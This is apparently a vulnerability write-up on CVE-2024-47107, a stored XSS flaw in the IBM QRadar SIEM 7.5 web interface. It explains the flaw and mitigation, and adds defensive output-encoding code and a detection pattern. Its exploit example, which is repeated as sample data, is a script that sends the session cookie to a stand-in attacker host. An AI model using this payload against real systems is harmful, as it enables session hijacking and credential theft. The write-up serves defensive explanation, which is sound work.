In May 2024, a significant security flaw was discovered in IBM QRadar SIEM version 7.5. This bug, logged as CVE-2024-47107, allows authenticated users to inject and store malicious JavaScript code within the web interface. If exploited, this stored cross-site scripting (XSS) issue could let an attacker alter system behavior, steal user credentials, and even take over user sessions—all from within a trusted environment.

This article dives deep into how this vulnerability works, how to exploit it, and how to prevent it. It also includes code snippets and references, keeping everything clear and in straightforward language.

What Is Stored XSS and Why Does It Matter?

Stored XSS (cross-site scripting) occurs when an application accepts and stores user input (like names, descriptions, or comments) and then displays it to others *without* properly cleaning it up. If the app doesn't check for scripts, an attacker can save a JavaScript payload and that code will run in other people's browsers when they view the affected page.

How CVE-2024-47107 Works

If a logged-in user enters JavaScript payloads into certain input fields, QRadar SIEM fails to sanitize the input before displaying it. When another (or even the same) user views the input on the Web UI, the JavaScript executes in their browser context. This could allow an attacker to:

Perform unauthorized actions on behalf of the target.

Vulnerable Component:
IBM QRadar SIEM version 7.5 Web UI

Impacted Users:
Any authenticated user with access to input fields and pages reflecting user-controlled data.

Exploit Example

Suppose there’s a “description” field for a log source or asset in the SIEM interface. An attacker could enter:

<script>
  fetch('https://evil.example.com/steal?cookie=' + document.cookie);
</script>

If this input is later rendered in the admin’s browser, the script will silently send the target’s session cookie to the attacker's server.

Reference

- IBM Security Bulletin: IBM QRadar SIEM Vulnerabilities (CVE-2024-47107)
- NIST NVD CVE Detail: CVE-2024-47107
- QRadar Product Page: IBM QRadar SIEM

Sanitize Input:

If you customize any part of the interface, use HTML and JavaScript sanitizing libraries to filter user input.
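
One way to apply this in a custom interface component, shown as an added example that is not code from IBM or from the original article: encode stored fields at output time, and audit existing records for markup that would run if echoed raw. The function names, the record shape and the sample data are assumptions constructed for illustration.

```javascript
// Added example: output encoding for user-controlled fields in a custom UI page.
// Function names and the record shape are assumptions, not QRadar APIs.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;',
};

// Encode a value for use in HTML text or inside a quoted attribute value.
function escapeHtml(value) {
  return String(value ?? '').replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Build a table row for a log source; every stored field is encoded when rendered,
// so markup saved in the description is displayed as text instead of being parsed.
function renderLogSourceRow(source) {
  const name = escapeHtml(source.name);
  const desc = escapeHtml(source.description);
  return `<tr><td title="${name}">${name}</td><td>${desc}</td></tr>`;
}

// Audit heuristic for already-stored values: script-capable tags, inline event
// handlers, javascript: URLs. A triage aid for review, not a substitute for encoding.
const ACTIVE_MARKUP =
  /<\s*(script|iframe|object|embed|svg|img)\b|\bon[a-z]+\s*=|javascript\s*:/i;

function findSuspectRecords(records) {
  return records
    .filter((r) => ACTIVE_MARKUP.test(String(r.description ?? '')))
    .map((r) => r.id);
}

// Constructed sample data (record 2 carries the payload from the example above).
const SAMPLE_SOURCES = [
  { id: 1, name: 'fw-edge-01', description: 'Perimeter firewall, syslog over TLS' },
  { id: 2, name: 'web-proxy', description:
      "<script>fetch('https://evil.example.com/steal?cookie=' + document.cookie);</script>" },
  { id: 3, name: 'dc-"primary"', description: 'Domain controller <WinCollect> & DNS' },
];

console.log(SAMPLE_SOURCES.map(renderLogSourceRow).join('\n'));
console.log('Records to review:', findSuspectRecords(SAMPLE_SOURCES));
```

Encoding at output time keeps legitimate text such as `<WinCollect>` readable while preventing the browser from interpreting it; the audit list identifies stored records worth reviewing after the patch is applied.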

Conclusion

The CVE-2024-47107 stored XSS vulnerability in IBM QRadar SIEM 7.5 is a serious threat because it can silently allow attackers to hijack sessions or steal credentials. The attack exploits weaknesses in the way user input is stored and reflected, highlighting the need for strict input validation and fast patch management.

Security teams should treat this flaw as a priority, apply updates, and review permissions within their SIEM systems.

Timeline

Published on: 12/07/2024 15:15:04 UTC